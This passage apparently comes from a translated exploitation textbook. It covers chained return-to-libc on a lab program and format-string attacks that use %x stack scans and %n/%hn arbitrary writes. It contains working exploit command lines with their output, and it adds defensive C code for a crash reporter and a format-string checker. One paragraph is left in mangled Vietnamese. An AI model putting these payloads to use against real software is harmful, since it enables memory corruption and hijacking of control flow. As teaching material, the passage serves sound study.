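As an added example that is not the book's code, here is how a SIGSEGV handler like the one in stack6.c should be written when its job is to alert an administrator: everything in it is async-signal-safe, and the process still terminates abnormally. The names format_crash_line and install_crash_reporter are my own, and it assumes a POSIX system with sigaction and SA_SIGINFO.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/* Added example, not from the book. stack6.c's segv_handler calls printf()
 * and abort() from inside the handler; printf is not async-signal-safe and
 * can deadlock or corrupt stdio state if the fault happened inside a libc
 * call. This reporter does the same job the safe way: it formats the
 * message by hand, emits it with write(2), and then lets the signal's
 * default action end the process (SA_RESETHAND plus raise), so a
 * supervisor or a core dump still records an abnormal exit. The faulting
 * address from siginfo_t is what an exploit like the one on this page
 * leaves behind (for example the 61616161 that system returns into). */

static int report_fd = 2;   /* stderr by default; a log pipe in practice */

/* Copies s into out (at most cap bytes); returns the bytes written. */
static size_t put_str(char *out, size_t cap, const char *s)
{
    size_t w = 0;
    while (s[w] != '\0' && w < cap) {
        out[w] = s[w];
        w++;
    }
    return w;
}

/* Writes v in the given base (10 or 16) into out; returns bytes written. */
static size_t put_num(char *out, size_t cap, unsigned long v, unsigned base)
{
    char tmp[24];              /* enough for 64-bit values in base 10 */
    size_t n = 0, w = 0;
    do {
        tmp[n++] = "0123456789abcdef"[v % base];
        v /= base;
    } while (v != 0);
    while (n > 0 && w < cap)
        out[w++] = tmp[--n];
    return w;
}

/* Builds "crash: signal <sig> at 0x<addr>\n" without any libc formatting
 * function. Returns the length written; the result is NUL-terminated, and
 * if it does not fit the last byte is replaced by the terminator. */
size_t format_crash_line(char *out, size_t cap, int sig, const void *addr)
{
    size_t w = 0;
    w += put_str(out + w, cap - w, "crash: signal ");
    w += put_num(out + w, cap - w, (unsigned long) sig, 10);
    w += put_str(out + w, cap - w, " at 0x");
    w += put_num(out + w, cap - w, (unsigned long) (uintptr_t) addr, 16);
    w += put_str(out + w, cap - w, "\n");
    if (w < cap)
        out[w] = '\0';
    else if (cap > 0)
        out[cap - 1] = '\0';
    return w;
}

static void crash_reporter(int sig, siginfo_t *info, void *ctx)
{
    char line[64];
    size_t n;
    ssize_t ignored;
    (void) ctx;
    n = format_crash_line(line, sizeof line, sig, info ? info->si_addr : NULL);
    ignored = write(report_fd, line, n);   /* write(2) is async-signal-safe */
    (void) ignored;                        /* nothing useful to do if it fails */
    /* SA_RESETHAND already restored SIG_DFL; the re-raised signal is delivered
     * when the handler returns, so the default action terminates the process. */
    raise(sig);
}

/* Installs the reporter for SIGSEGV, sending reports to fd.
 * Returns 0 on success, -1 on failure (errno set by sigaction). */
int install_crash_reporter(int fd)
{
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sigemptyset(&sa.sa_mask);
    sa.sa_sigaction = crash_reporter;
    sa.sa_flags = SA_SIGINFO | SA_RESETHAND;
    report_fd = fd;
    return sigaction(SIGSEGV, &sa, NULL);
}
```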
Finally, to avoid the segmentation fault, we simply have system return to exit, as in Figure 3.14. The work involves finding the address of exit and putting it in place of the 4 characters a in our exploit command. The address of exit (a standard library function) can be found with GDB the same way we found the address of system; it is B7ED92E0. Our exploit command is then similar to the screenshot below.
regular@exploitation:~/src$ python -c 'print "\x00"*(0x10+4+4) + "\x90\x39\xEE\xB7" + "\xE0\x92\xED\xB7" + "\x39\xFC\xFF\xBF"' | ./stack6
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!
regular@exploitation:~/src$
The technique we have just examined is called chained return to libc. It extends return to libc to perform more than one task in a single exploit. In this section's example, we returned to libc twice, to run a command and to exit the program. With the values and the call order arranged precisely, however, we can chain many more returns to libc.
regular@exploitation:~/src$ python -c 'print "\x00"*(0x10+4+4) + "\x70\x23\xEF\xB7" + "\xF0\x22\xEF\xB7" + "\x54\xFA\xFF\xBF" + "\x5C\xFA\xFF\xBF" + "\xE0\x92\xED\xB7" + "\x5C\xFA\xFF\xBF" + "You win!"' | ./stack6
&buf: 0xbffffa34, &cookie: 0xbffffa44
You win!regular@exploitation:~/src$
The exploit command above, which chains main, sprintf, printf and exit, is purely for illustration and has no practical value, since the reader can easily use just printf and exit without the preceding sprintf. A thorough explanation of that command is left as a puzzle for the reader.
3.7 Summary and things to remember
• Buffer overflow is one of the most dangerous bugs and is still common today. In essence, a buffer overflow is simply input data exceeding the memory allocated to hold it. The danger arises when data important to the program lies beyond the overflowed region and the overflowing data can alter it.
• To exploit a program, the exploiter must first understand thoroughly how the program itself, the libraries it uses, and the functions it calls work. This understanding lets the exploiter quickly fix or bypass obstacles inside the program. Broad understanding also helps the exploiter find another method instead of insisting on an old one that has been blocked.
• Exploitation requires answering two important questions: what data to supply, and how to get that data into the program. Both can only be answered with a thorough understanding of how the program works.
• If the program reads from standard input, we can use a pipe or redirection to change the program's input stream.
• Scripting languages save the exploiter a great deal of time. Python is one of the most commonly used.
• Important data that affects the program's execution may be a variable, an important flag, or a function's return address on the stack.
• Tools such as objdump and GDB can tell us a lot about a program, such as its assembly instructions, their addresses, and even the corresponding machine code.
• GDB is a debugger that lets us examine a program's execution interactively. We can use GDB to find the addresses of functions in the standard library.
• There are many ways to load data into a program's memory: ordinary input, environment variables, command-line arguments, or even the program's name.
• Environment variable addresses are very sensitive to changes in the number, contents, and names of environment variables. Two programs must have the same execution environment for their environment variable addresses to match. Each extra character in the program name lowers the environment variable addresses by two.
• Returning into the program itself is the technique of changing the program's flow of execution by changing a function's return address so that the instruction pointer points into the program's .text segment. Identifying the role of each stack slot is key to the success of these flow-changing techniques. Where data is placed also needs attention, to avoid it being overwritten by other functions' stack frames.
• Return to libc is similar to returning into .text, but the instruction pointer is pointed at functions in the standard library instead of the program's own instructions. Several returns to libc can be chained to perform multiple tasks in one exploit.
• The standard library is used by almost every program. This gives us a large toolbox when using return to libc, because every function in the library can be used even if the program itself never references it.
• Sometimes exploitation is as simple as creating a soft link or renaming a file. Sometimes it demands meticulous study, detailed calculation, and creativity in adapting basic techniques. Exploitation is also a process of trial and error to discover new approaches and compare changes in the program's behaviour.
Figure 3.14: Chaining two returns, to system and then exit (flowchart: in main, prologue, printf, gets, then the test cookie = 000D0A00? with equal leading to printf and not equal skipping it; main's epilogue flows into system's prologue, body and epilogue, and from there into exit's prologue, body and epilogue).
Chapter 4
Format strings
Just as common, similarly dangerous, and easier to exploit than buffer overflows are the bugs related to format strings.
4.1 Concept
We used printf in the examples of the previous sections like this:
printf("You win!");
The string You win! is printf's first argument, and this argument has a special role for printf: it determines how the following arguments are displayed. For this reason, printf's first argument is called the format string. Format strings are also used by the functions in printf's family, such as sprintf, fprintf, vsprintf, etc.
Let us try running a few small programs like the following.
#include <stdio.h>

int main()
{
    printf("One percent is written as 1%\n");
}

#include <stdio.h>

int main()
{
    printf("One thousandth is written as 1%%\n");
}
The first piece of code prints One percent is written as 1%, and the second prints One thousandth is written as 1%. The reader will notice that one percent sign is missing from the second result. This shows that printf does not simply print its first argument as passed, but performs certain processing on it.
The printf documentation says that the percent character (%) has a special meaning in a format string. It marks the beginning of a conversion specification, which ends with a conversion specifier. Some possible conversion specifiers include %, c, x, X, s, n, hn.
% prints the percent character itself. This is why the second piece of code prints only one percent sign.
c prints the argument as a character.
x prints the argument as a hexadecimal number, using lowercase letters.
X is like x but uses uppercase letters.
s prints the string at the location pointed to by the argument.
n writes to the location pointed to by the argument the number of characters (a 4-byte integer) printed so far.
hn is like n but writes only the low 2 bytes instead of all 4.
These conversion specifiers may take arguments; the first argument has position 1. If no position is specified (footnote 1), the argument used is the next one. The example below has two conversion specifications, %c and %X. The first argument is 0x87654321, and the argument for the second conversion specification is 0x12345678. When run, we get the text !12345678.
#include <stdio.h>

int main()
{
    printf("%c%X\n", 0x87654321, 0x12345678);
}
Between the percent character and the conversion specifier there are other options, which we will look at through the exercises of this part.
4.2 Scanning the stack
We will consider the example in Source 4.1. The program's purpose is to read user input and print the entered string to the screen. However, after reading the data, the program passes the string straight in as printf's first argument, rather than as an argument for a format string.
When we enter abcdef, the program prints abcdef itself.
regular@exploitation:~/src$ ./fmt
&cookie: 0xbffff854
abcdef
cookie = 00000000
abcdef
cookie = 00000000
regular@exploitation:~/src$
However, when we enter %x, the program prints a rather strange result.
Footnote 1: We will talk about specifying the argument in Subsection 4.4.4.
#include <stdio.h>

int main(int argc, char *argv[])
{
    char buffer[512];
    int cookie = 0;
    printf("&cookie: %p\n", &cookie);
    gets(buffer);
    printf("cookie = %.8X\n", cookie);
    printf(buffer);          /* user input used directly as the format string */
    printf("\ncookie = %.8X\n", cookie);
    return 0;
}
Source 4.1: fmt.c
regular@exploitation:~/src$ ./fmt
&cookie: 0xbffff854
%x
cookie = 00000000
0
cookie = 00000000
regular@exploitation:~/src$
The program prints 0. Trying again with the string %x %x %x %x gives the result below.
regular@exploitation:~/src$ ./fmt
&cookie: 0xbffff854
%x %x %x %x
cookie = 00000000
0 0 0 6
cookie = 00000000
regular@exploitation:~/src$
The string we get is 0 0 0 6.

Stop and think
Why do we get that sequence of numbers?
We entered %x %x %x %x. This makes the program perform the call
printf("%x %x %x %x");
This printf has four %x conversion specifications, so it needs four arguments, but none were passed. So what values does printf print?
Consider how the compiler translates a similar printf call, but with all its arguments, into assembly.
printf("%x %x %x %x", 1, 2, 3, 4);
It becomes lines like the following:
PUSH 4
PUSH 3
PUSH 2
PUSH 1
PUSH buffer
CALL printf
Compared with the call lacking arguments:
PUSH buffer
CALL printf
The difference is the four stack slots holding definite values in the first case, and their absence in the second. However, printf only learns about the 4 conversion specifications at run time, once it is inside the function body. So printf cannot know whether 4 PUSH instructions set up those slots before it was called. Therefore, when it meets conversion specifications that take arguments, printf simply fetches data from the corresponding positions on the stack and processes it as requested. Figure 4.1 illustrates what the stack slots must contain when the printed string is 0 0 0 6.
We do not know why the stack slots hold the values 0, 0, 0, and 6, but we know they must. This is a capability that format string bugs give the exploiter: with the %x conversion specification, we can read the values of stack slots.
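As an added example that is not part of the book, the following C code parses a format string the way 4.1 describes and counts how many stack slots printf would read, which is the defensive counterpart of the stack scan in 4.2, alongside the hardened form of fmt.c's printf(buffer). The names inspect_format, format_is_safe and print_user_text are my own; the parser goes a little beyond the page by also handling flags, width, precision and length modifiers.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the book. fmt.c passes user input straight to
 * printf as the format string, and 4.2 shows why that matters: printf
 * reads one stack slot for every conversion specification whether or not
 * a matching argument was pushed. inspect_format() walks a format string
 * with the rules of 4.1 ("%%" is a literal percent, any other "%..." is
 * a conversion specification) and reports how many arguments it would
 * consume and whether it writes to memory (%n, %hn). Positional "%1$x"
 * forms, which the book defers to 4.4.4, are not parsed and are reported
 * as bad, i.e. conservatively as unsafe. GCC's -Wformat-security warns
 * about the original printf(buffer) at compile time as well. */

struct fmt_report {
    int args;    /* stack slots the conversions would consume */
    int writes;  /* %n-style conversions (memory writes) */
    int bad;     /* 1 if some '%' has no valid specifier after it */
};

struct fmt_report inspect_format(const char *fmt)
{
    struct fmt_report r = {0, 0, 0};
    const char *p = fmt;

    while (*p) {
        if (*p++ != '%')
            continue;
        if (*p == '%') {                         /* "%%": one '%', no argument */
            p++;
            continue;
        }
        while (*p && strchr("-+ #0", *p))        /* flags */
            p++;
        if (*p == '*') {                         /* width taken from an argument */
            r.args++;
            p++;
        } else {
            while (*p >= '0' && *p <= '9')       /* literal width */
                p++;
        }
        if (*p == '.') {                         /* precision */
            p++;
            if (*p == '*') {
                r.args++;
                p++;
            } else {
                while (*p >= '0' && *p <= '9')
                    p++;
            }
        }
        while (*p && strchr("hljztL", *p))       /* length modifiers */
            p++;
        if (*p == '\0' || !strchr("diouxXeEfFgGaAcspn", *p)) {
            r.bad = 1;                           /* e.g. the "1%\n" of 4.1 */
            continue;                            /* leave the char for the loop */
        }
        r.args++;
        if (*p == 'n')
            r.writes++;
        p++;
    }
    return r;
}

/* The hardened form of fmt.c's `printf(buffer)`: user text is passed as
 * data to a constant format, so "%x %x %x %x" is printed literally instead
 * of reading four stack slots. Returns what printf returns. */
int print_user_text(const char *user)
{
    return printf("%s", user);
}

/* Policy check for code that must accept a caller-supplied format (a
 * logging API, say): the format must consume exactly the nargs arguments
 * the caller passes, must not write memory, and must be well-formed.
 * Returns 1 if acceptable, 0 otherwise. */
int format_is_safe(const char *fmt, int nargs)
{
    struct fmt_report r = inspect_format(fmt);
    return r.args == nargs && r.writes == 0 && !r.bad;
}

int main(void)
{
    /* Constructed sample: the inputs this page feeds to fmt.c. */
    const char *samples[] = {"abcdef", "%x", "%x %x %x %x", "%hn"};
    for (int i = 0; i < 4; i++) {
        struct fmt_report r = inspect_format(samples[i]);
        printf("%-14s args=%d writes=%d bad=%d safe_with_no_args=%d\n",
               samples[i], r.args, r.writes, r.bad, format_is_safe(samples[i], 0));
    }
    return 0;
}
```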
4.3 Meeting the input again
If we keep scanning the stack with %x conversion specifications, we run into the following situation:
regular@exploitation:~/src$ ./fmt
&cookie: 0xbffff854
%x %x %x %x %x %x %x %x %x %x %x %x
cookie = 00000000
0 0 0 6 b7ead8e0 fffff 51 0 0 25207825 78252078 20782520
cookie = 00000000
regular@exploitation:~/src$
The sequence 25207825 78252078 20782520 looks special. When laid out as stack slots as in Figure 4.2, we can immediately recognise the value 25207825 as the four characters %x %, the first four characters of the input string. Moreover, starting from argument 10, the data we read back is exactly the string we entered.
Figure 4.1: Arguments of the conversion specifications. From low to high addresses: printf's local variables, old ebp, printf's return address, the address of the format string, then the slots printf reads as arguments 1 to 4: 00 00 00 00, 00 00 00 00, 00 00 00 00, 06 00 00 00.

Stop and think
Can the reader explain why?
Chng ta bit rng kh nng qut ngn xp l mt trong nhng im chng
ta c th li dng trong li trn b m. Nh li rng bin buffer ca chng
ta cng c t trong ngn xp. V nh m t trong Hnh 2.12, vng nh
ca printf nm di vng nh ca main. Do , khi ta qut ngn xp t di
ln, n mt lc no chng ta s gp li bin buffer. Trong v d ny, buffer
bt u t tham s 10. Chng ta s cn nh v tr ny v n cho php chng
ta truyn tham s vo cc yu cu nh dng. V d truyn s 41414141 th
chng ta s nhp bn k t A u chui, v m bo rng yu cu nh dng
%x s dng tham s th 10.
4.4 Changing the cookie variable
The %n conversion writes, into the memory pointed to by its argument, the number of characters printed so far. To write arbitrary data into a memory location we therefore need two things:
- pass the address of that location as the argument of %n;
- control the number of characters printed before %n is reached.

Figure 4.2: Meeting the input again. Stack slots from argument 1 upwards: 00 00 00 00, 00 00 00 00, 00 00 00 00, 06 00 00 00, E0 D8 EA B7, FF FF 0F 00, 51 00 00 00, 00 00 00 00, 00 00 00 00, then argument 10 = 25 78 20 25 ("%x %"), 78 20 25 78, 20 25 78 20, and so on: the bytes of our own input.

Since we can pass arguments to %n, the first requirement reduces to finding the address of the location. For example, to change the value of cookie we must know the address of cookie. We will now look at a few ways of controlling the second requirement.
4.4.1 Writing the value 0x64
Our goal is to make cookie equal 0x64 after printf runs. To simplify finding the address of cookie, Source 4.1 prints the address to the screen: it is BFFFF854.
So we place four characters with the codes 54, F8, FF, BF at the start of the string, follow them with nine conversions that each consume an argument, then enough padding characters to bring the total printed to 0x64 (100 decimal), and make the tenth conversion %n.
In the earlier experiments we used a run of %x conversions, so we know the values (and hence the lengths) of what nine %x print: 1 + 1 + 1 + 1 + 8 + 5 + 2 + 1 + 1 = 21 characters, 0x15 in hex. So the padding, besides the 4 address bytes and the 0x15 characters printed by the nine %x, must be 0x64 - 0x15 - 4 = 0x4B, i.e. 75 (decimal) characters.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF%x%x%x%x%x%x%x%x%x" + "a"*75 + "%n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####06b7ead8e0fffff5100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
cookie = 00000064
regular@exploitation:~/src$
4.4.2 Writing the value 0x100
For cookie to hold 0x100, all we have to do is add 0x100 - 0x64 = 0x9C more padding characters.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF%x%x%x%x%x%x%x%x%x" + "a"*(0x4B+0x9C) + "%n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####06b7ead8e0fffff5100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaa
cookie = 00000100
regular@exploitation:~/src$
4.4.3 Writing the value 0x300
For cookie to hold 0x300, all we have to do is add 0x300 - 0x64 = 0x29C more padding characters.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF%x%x%x%x%x%x%x%x%x" + "a"*(0x4B+0x29C) + "%n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####06b7ead8e0fffff5100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
cookie = 00000300
Segmentation fault
regular@exploitation:~/src$
Although cookie got the value we wanted, we also hit a segmentation fault.

Stop reading and think

Why did we get a segmentation fault?

We fed the program 4 leading characters, 9 pairs of %x, 0x2E7 padding characters and the 2 characters of %n: 4 + 9*2 + 0x2E7 + 2 = 0x2FF characters in total. These are copied straight into buffer. Since buffer holds only 512 (0x200) characters, we overflowed it, main returned to an unmapped address, and the program crashed with a segmentation fault.
To avoid the crash we must type less while still making printf print the same number of characters.
One of the options that can sit between the percent sign and the conversion character is the minimum width of the printed field. It is a string of decimal digits beginning with a non-zero digit. For example, to print an integer in hexadecimal with a width of 18 (0x12) we use
printf("%18X", 0x12345678);
which prints ten spaces followed by 12345678. With
printf("%2X", 0x12345678);
we still get 12345678. The width is therefore only a minimum: if the data is longer than the requested width, all of it is printed and nothing is cut off. To be sure we control the length of the output, it is best to assume the data will be as long as it can be. With %x the maximum is 8 digits, so we should request a minimum width of at least 8.
Now, to write 0x300 into cookie, we use the first 4 bytes to give the address of cookie, then eight %8x conversions, a ninth with a width of 0x300 - 4 - 8*8 = 0x2BC (700 decimal), i.e. %700x, and a final %n. This uses only 4 + 8*3 + 5 + 2 = 35 (0x23) characters to reach the goal, instead of the 0x2FF above.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF" + "%8x" * 8 + "%700x" + "%n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T##### 0 0 0 6b7ead8e0 fffff 51 0
0
cookie = 00000300
regular@exploitation:~/src$
4.4.4 Writing 0x300 with only one %x and one %n
If we can control the number of characters printed, a single %x conversion is in fact enough. The only snag is that %n must still use the tenth argument rather than the one following %x (the second).
Luckily, one of the options of a conversion specification is the argument position: a string of positive decimal digits ending with a dollar sign ($). This option must come right after the percent sign that starts the conversion. For example, with the input AAAA%10$x we get AAAA41414141.
regular@exploitation:~/src$ ./fmt
&cookie: 0xbffff854
AAAA%10$x
cookie = 00000000
AAAA41414141
cookie = 00000000
regular@exploitation:~/src$
Assigning 0x300 to cookie now simplifies to the command in the transcript. We still need the 4 bytes giving the address of cookie, then a width of 0x300 - 4 = 0x2FC, i.e. 764, for the x conversion, and we finish with an n conversion that uses the tenth argument.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF" + "%764x" + "%10$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####
0
cookie = 00000300
regular@exploitation:~/src$
4.4.5 Writing the value 0x87654321
For cookie to hold 0x87654321, we only have to change the width of the x conversion to 0x87654321 - 4 = 0x8765431D, i.e. 2271560477 in decimal.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF" + "%2271560477x" + "%10$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#####
cookie = 00000005
regular@exploitation:~/src$
                  byte 1  byte 2  byte 3  byte 4
Wanted            21      43      65      87
Already printed   10      21      43      65
Still to print    11      22      22      22
Table 4.1: Computing the number of padding characters (all values in hex)

It seems printf did not do what we wanted. Most likely the width is too large (it does not fit in an int), so printf rejected the request.
Even if the width had been accepted, we would have had to wait quite a while for printf to print more than two billion characters! So we need to come up with another way.

Stop reading and think

What can we do here?

For cookie to hold 0x87654321, the four bytes starting at BFFFF854 must hold 21, 43, 65 and 87 respectively. So instead of writing one large value in one go, we can split the work into four writes of four small values.
For each write we need three pieces of information:
- the address to write to;
- the argument position passed to the conversion specification;
- the value to write.
For four writes we need four addresses. Since we write the bytes from low to high, the addresses of the four writes are BFFFF854, BFFFF855, BFFFF856 and BFFFF857.
These four addresses can be placed in order at the start of the string, so the argument positions passed to the conversions are 10, 11, 12 and 13.
The values to write are 21, 43, 65 and 87. To print 0x21 characters, beyond the 0x10 characters that make up the four addresses, we need to print 0x11 more. To print 0x43 characters, beyond the 0x21 already printed, we need 0x22 more, and so on. The padding calculation before each write is summarized in Table 4.1.
Our exploit command looks like the following transcript.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF\x56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x11) + "x%10$n" + "%" + str(0x22) + "x%11$n" + "%" + str(0x22) + "x%12$n" + "%" + str(0x22) + "x%13$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V####### 0 0
0 6
cookie = 87654321
regular@exploitation:~/src$
4.4.6 Writing the value 0x12345678
For cookie to hold 0x12345678, the four bytes starting at cookie must hold 78, 56, 34 and 12. Applying the padding calculation above gives us negative values (for example 0x56 - 0x78).

Stop reading and think

Can we write to the high address before the low one?

Stop reading and think

Once 0x78 characters have been printed, how many more must be printed to get the byte 56 written?

We have no way of reducing the number of characters printed. However, since we only care about the last byte, 0x69, 0x169, 0x269 or 0x33369 all leave the same last byte 69. The surplus bytes are either overwritten by the next write, or simply land outside the four bytes of cookie that we care about. It is precisely because of this overwriting that we cannot go from high to low: the second write would destroy the value written by the first, and the third would likewise destroy the second.
Based on this wrap-around of the last byte, we perform four writes with the values 0x78, 0x156, 0x234 and 0x312. These values guarantee that subtracting each count from the next never gives a negative number. Figure 4.3 shows in detail how memory changes over the four writes and which bytes get smeared. Our exploit command looks like the following transcript.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF\x56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x78-16) + "x%10$n" + "%" + str(0x156-0x78) + "x%11$n" + "%" + str(0x234-0x156) + "x%12$n" + "%" + str(0x312-0x234) + "x%13$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V#######
0
0
0
6
cookie = 12345678
regular@exploitation:~/src$
                       BFFFF854 .......... BFFFF857
          ... XX XX XX XX XX XX XX ...
Write 1   ... 78 00 00 00 XX XX XX ...
Write 2   ... 78 56 01 00 00 XX XX ...
Write 3   ... 78 56 34 02 00 00 XX ...
Write 4   ... 78 56 34 12 00 00 00 ...
Figure 4.3: The four writes. The first four columns are cookie; the bytes to their right are the smeared ones (XX = undefined).
Writing one byte at a time, as we just did, is only one way of cutting the value into smaller pieces. Figure 4.4 shows a few other splits.
2-2 is the best split: it uses the fewest writes and, with two hn conversions, never smears. Figure 4.5a shows how the command python -c 'print "\x54\xF8\xFF\xBF\x56\xF8\xFF\xBF" + "%" + str(0x5678 - 8) + "x%10$hn" + "%" + str(0x11234 - 0x5678) + "x%11$hn"' | ./fmt works. Note that hn stores only the low 16 bits of the count, so the second width, 0x11234 - 0x5678, drives the count past 0x10000 to get from 0x5678 "down" to 0x1234, the same wrap-around trick as above but on two bytes at a time.
1-1-2 can be used with n-n-hn if we accept 1 byte of smearing, or with n-hn-hn to avoid it. Figure 4.5b shows how the command python -c 'print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF" + "\x56\xF8\xFF\xBF" + "%" + str(0x78 - 12) + "x%10$n" + "%" + str(0x156 - 0x78) + "x%11$hn" + "%" + str(0x1234 - 0x156) + "x%12$hn"' | ./fmt works.
1-1-1-1 is the most basic split, the one we presented here. It smears at least 1 byte and at most 3, depending on the mix of n and hn conversions.
4.4.7 Writing the value 0x04030201
For cookie to hold 0x04030201, the four bytes starting at cookie must be 01, 02, 03 and 04. We use the 1-1-1-1 split, so the four counts to reach are 0x101, 0x102, 0x103 and 0x104. Notice that only the first value was smaller than the 16 (decimal) characters that make up the four addresses, so only it had to be bumped to 0x101; the others simply build on the previous count so that the last byte matches the wanted value.

Figure 4.4: Common ways of splitting the four bytes 21 43 65 87 (or 78 56 34 12) at BFFFF854..BFFFF857: 1-1-1-1, 2-2, 1-1-2 and the like; X marks a byte that no write covers.

                 BFFFF854 .... BFFFF857
           ... XX XX XX XX ...
Write 1    ... 78 56 XX XX ...
Write 2    ... 78 56 34 12 ...
(a) 2-2 split with hn

           ... XX XX XX XX ...
Write 1    ... 78 00 00 00 ...
Write 2    ... 78 56 01 00 ...
Write 3    ... 78 56 34 12 ...
(b) 1-1-2 split with n-hn-hn
Figure 4.5: Split schemes
Our exploit command looks like the transcript below.
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF\x56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x101-16) + "x%10$n" + "%" + str(0x102-0x101) + "x%11$n" + "%" + str(0x103-0x102) + "x%12$n" + "%" + str(0x104-0x103) + "x%13$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V#######
0006
cookie = 04030201
regular@exploitation:~/src$
If you are happy with the exploit command above, you have forgotten what we discussed in Subsection 4.4.3. To make sure the length of the output is always exact, every width given in a conversion must be at least the maximum length of the data being printed. In this example %x prints at most 8 characters, so we should only use %x with a width greater than or equal to 8. Since 0x102 - 0x101 = 1, and likewise 0x103 - 0x102 = 1 and 0x104 - 0x103 = 1, are all less than 8, we replace those %x conversions with a single arbitrary character each. (The command above only worked because the stack values those %x happened to print were single digits.)
regular@exploitation:~/src$ python -c 'print "\x54\xF8\xFF\xBF\x55\xF8\xFF\xBF\x56\xF8\xFF\xBF\x57\xF8\xFF\xBF" + "%" + str(0x101-16) + "x%10$n" + "a%11$n" + "a%12$n" + "a%13$n"' | ./fmt
&cookie: 0xbffff854
cookie = 00000000
T#######V#######
0aaa
cookie = 04030201
regular@exploitation:~/src$
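The padding arithmetic of Subsections 4.4.5 to 4.4.7, carried out in code. This is an added example and not the book's own code: it implements the 2-2 split with two hn conversions from Figure 4.5a, using the wrap-around rule of 4.4.6 (when the next half is "smaller" than the current count, add a full lap of 0x10000), and then performs the write with a real pair of %hn conversions inside the same process so the result can be checked. The fmt program, cookie and the stack positions 10 and 11 are not needed here: the widths are passed as arguments via *, and the target pointers are passed directly as the %hn arguments, which keeps the format string a literal. The 8-byte prefix stands in for the two addresses printed at the front of the exploit string. The names plan_2_2, fmt_write32 and next_pad are ours, and the little-endian layout of x86 is assumed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* %x prints at most 8 digits, so a width of at least 8 makes the printed
 * length equal to the width exactly (the rule from Subsection 4.4.3). */
#define MIN_WIDTH 8

struct plan {
    int pad_lo;   /* width of the %x before the first %hn  */
    int pad_hi;   /* width of the %x before the second %hn */
};

/* Smallest width >= MIN_WIDTH that moves the running count from `count`
 * to `want` modulo 0x10000. Because %hn stores only the low 16 bits, a
 * "negative" step (the 0x12345678 case) is taken by adding a full lap. */
static int next_pad(unsigned count, unsigned want)
{
    int pad = (int)((want - count) & 0xffffu);
    if (pad < MIN_WIDTH)
        pad += 0x10000;
    return pad;
}

/* 2-2 split: the low half of `value` is written first at the lower address,
 * then the high half at address + 2 (little-endian layout, as on x86). */
struct plan plan_2_2(uint32_t value, unsigned already_printed)
{
    struct plan p;
    unsigned count = already_printed;       /* e.g. the 8 address bytes */

    p.pad_lo = next_pad(count, value & 0xffffu);
    count += (unsigned)p.pad_lo;            /* count == low half (mod 2^16) */
    p.pad_hi = next_pad(count, value >> 16);
    return p;
}

/* Carry out the write with a real pair of %hn conversions and return what
 * landed in the target word. The widths are passed as arguments ('*'), so
 * the format string itself stays a literal; the exploit on the page embeds
 * the same numbers in the string instead. */
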